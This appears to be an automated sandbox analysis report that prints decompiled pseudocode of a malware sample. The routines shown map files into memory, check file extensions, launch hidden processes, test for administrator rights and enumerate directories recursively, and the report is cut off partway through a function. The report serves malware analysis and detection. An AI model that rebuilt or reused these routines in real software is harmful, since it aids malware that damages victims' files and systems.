Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: fb7152c015a3afb5dcfec2f8db37e8e32d708278aef47a4922f13d563408f030
Instruction ID: 68e65bdadf4d99958d3fc84170a2964def93cf3a5327fb5d58cf4880402f4290
Opcode Fuzzy Hash: fb7152c015a3afb5dcfec2f8db37e8e32d708278aef47a4922f13d563408f030
Instruction Fuzzy Hash: 620104B0544300BBE3109F11CC8AF163BACAB45B21F004614FF64AA1C0D7F89515CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0FBB2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0FBB3030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0FBB3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0FBB3030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0FBB8400(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0FBB2830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0FBB2C02), ref: 0FBB28AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0FBB2C02), ref: 0FBB28BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FBB2C02), ref: 0FBB28E5
CloseHandle.KERNEL32(00000000,?,?,0FBB2C02), ref: 0FBB28F3
MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0FBB2C02), ref: 0FBB290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FBB2C02), ref: 0FBB2942
CloseHandle.KERNEL32(?,?,?,0FBB2C02), ref: 0FBB2951
CloseHandle.KERNEL32(00000000,?,?,0FBB2C02), ref: 0FBB2954

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: be56f93d32dc9d370badedbe8fad963b7d36d61d05bbcf9c361af418f63b5faa
Instruction ID: 4703dbd4876311039aa356628e8c0cdbeab2e7b7daed9a35e4ecd76402e214a6
Opcode Fuzzy Hash: be56f93d32dc9d370badedbe8fad963b7d36d61d05bbcf9c361af418f63b5faa
Instruction Fuzzy Hash: B4210771E002197FD7116B75AC85FBF77ACDB46665F4002A9FC05A3181D6B89C124DA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB69B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB69B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xfbc2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xfbc2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FBB6AEA), ref: 0FBB69D2

Strings

%s , xrefs: 0FBB6A19

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: f6dfcf54def013edfdc27f05f1d423163bd3c341ecebc347293c99149616880b
Instruction ID: bcb12271d3a705aa32e0006170fefc1997222dfa893205e05b2295bfb0d3097a
Opcode Fuzzy Hash: f6dfcf54def013edfdc27f05f1d423163bd3c341ecebc347293c99149616880b
Instruction Fuzzy Hash: 46215732A0022597DB304B5DBC403F273AEEB84321F4482EEEC469B181E7F4AE418ED0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBB4E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0FBB9170( &_v92, 0, 0x44);
				_t15 =  *0xfbc2a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xfbc2a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0fbb4e1c
0x0fbb4e22
0x0fbb4e24
0x0fbb4e29
0x0fbb4e2e
0x0fbb4e36
0x0fbb4e39
0x0fbb4e3c
0x0fbb4e41
0x0fbb4e48
0x0fbb4e4d
0x0fbb4e58
0x0fbb4e77
0x0fbb4e8d
0x0fbb4e98
0x0fbb4e79
0x0fbb4e83
0x0fbb4e83

APIs

_memset.LIBCMT ref: 0FBB4E29
CreateProcessW.KERNEL32 ref: 0FBB4E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0FBB4E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBB4E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBB4E92

Strings

D, xrefs: 0FBB4E58

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 815a1c2af2136bdfdd10eba54fa1a79e2cdd257fd9c890f7d2905c1fbfaf0fec
Instruction ID: cbbe1e4bba63694368cac8bafd757364671ee09641ac2da1696b4e8cc6412c4c
Opcode Fuzzy Hash: 815a1c2af2136bdfdd10eba54fa1a79e2cdd257fd9c890f7d2905c1fbfaf0fec
Instruction Fuzzy Hash: BC012171E40318ABDB20DFA99C46BDE7BB8EF09715F100156FA08F7180E7B565548F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0FBB3C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0fbb3c79
0x0fbb3c99
0x0fbb3ca0
0x0fbb3ca8
0x0fbb3cbf
0x0fbb3cce
0x0fbb3cd5
0x0fbb3cd7
0x0fbb3cda
0x0fbb3ce6
0x0fbb3cad
0x0fbb3cad
0x0fbb3cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBB3CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FBB3CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FBB3CBF
FreeSid.ADVAPI32(?), ref: 0FBB3CDA

Strings

CheckTokenMembership, xrefs: 0FBB3CB9
advapi32.dll, xrefs: 0FBB3CAE

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: dcf211527cd89787cba1b958a35b652a87daeab32d7802483d965180273b42f6
Instruction ID: a2a022564b2cba7b5471e4536571ce36ce8ac6f680069a7668cbcef8682427ae
Opcode Fuzzy Hash: dcf211527cd89787cba1b958a35b652a87daeab32d7802483d965180273b42f6
Instruction Fuzzy Hash: 72F03730E80309BBEB109BE5EC0AFBDB7BCEB04716F400588F900A6181E7B866158F55

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0FBB6E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0FBB6AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0FBB6DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

APIs

lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6E7C
lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6E96
lstrcatW.KERNEL32(00000000,?), ref: 0FBB6EA8
lstrcatW.KERNEL32(00000000,0FBBFF7C), ref: 0FBB6EB9

Part of subcall function 0FBB6DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6E23
Part of subcall function 0FBB6DF0: lstrcatW.KERNEL32(00000000,0FBBFF44), ref: 0FBB6E3B
Part of subcall function 0FBB6DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBB6F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FBB6F2E

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: a62c32935ba6be526a8d0df973a89dcb5e32c7f04cfa3d81664b1725c8da82e6
Instruction ID: f988022af3118aae7eadf513d4693cbc559b5777a4034e97518a79b530bfedee
Opcode Fuzzy Hash: a62c32935ba6be526a8d0df973a89dcb5e32c7f04cfa3d81664b1725c8da82e6
Instruction Fuzzy Hash: F1018031E0020DAACF219BA1EC48BFE7BBDEF04201F4040E9F805D2021DBB59A51DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

APIs

lstrlenA.KERNEL32(0FBB5444,00000000,?,0FBB5445,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3251
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB325B
HeapAlloc.KERNEL32(00000000,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3262
lstrlenA.KERNEL32(0FBB5444,00000000,?,0FBB5445,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3273
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB327D
HeapAlloc.KERNEL32(00000000,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3284
lstrcpyA.KERNEL32(00000000,0FBB5444,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3293

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: f31fa2fac0a4788db56339767050c0e427a805ac49c2448309eef02f9038b7ae
Instruction ID: 769a1d96ad700ca8cbc137a99bcebb87efd93f84180598d053040ae9a5c1ce81
Opcode Fuzzy Hash: f31fa2fac0a4788db56339767050c0e427a805ac49c2448309eef02f9038b7ae
Instruction Fuzzy Hash: FA1193304042946EDB612E68E8087F6BBDCEF03761F684199EDC5CB202C7B9A4578F61

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB33E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0FBB32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0FBB3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0FBB3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0FBB3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

APIs

Part of subcall function 0FBB32B0: lstrlenA.KERNEL32(?,00000000,?,0FBB5444,?,?,0FBB33F6,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB32C5
Part of subcall function 0FBB32B0: lstrlenA.KERNEL32(?,?,0FBB33F6,00000000,00000000,?,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB32EE

lstrlenA.KERNEL32(0FBB5445,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB3484
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB348E
HeapAlloc.KERNEL32(00000000,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB3495
lstrcpyA.KERNEL32(00000000,0FBB5445,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB34A7
ExitProcess.KERNEL32 ref: 0FBB34DB

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: df7d5ad6501c244b57b39a5e6060d47f73eaa38cfa76b818238b7a9e9828c9ee
Instruction ID: e50c35a6ea4148419281344d6d83806a99daf0e1fe3814a643b07d211a93c61a
Opcode Fuzzy Hash: df7d5ad6501c244b57b39a5e6060d47f73eaa38cfa76b818238b7a9e9828c9ee
Instruction Fuzzy Hash: 5731E3305042455AEB265F28B8447FA7BD8DB02310F9C41DDE885DB283E6FDA8878FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0FBB3D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBB3D66
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBB3D6A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBB3D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBB3D95

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 520cc13b6203e170b779fc59b4e31c01161c116e640f2763837ded457839a1e2
Instruction ID: 52a7a6e9436fda4a9f9845e3f42103c9fd8fd5025e47f35e132f740bacba6794
Opcode Fuzzy Hash: 520cc13b6203e170b779fc59b4e31c01161c116e640f2763837ded457839a1e2
Instruction Fuzzy Hash: 1D111BB0D4031C7EEB609F65DC0ABEA7ABCEB08700F0081D9A608E71C1D6B85B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB4EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xfbbfaac]");
				_t16 =  *0xfbbfab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
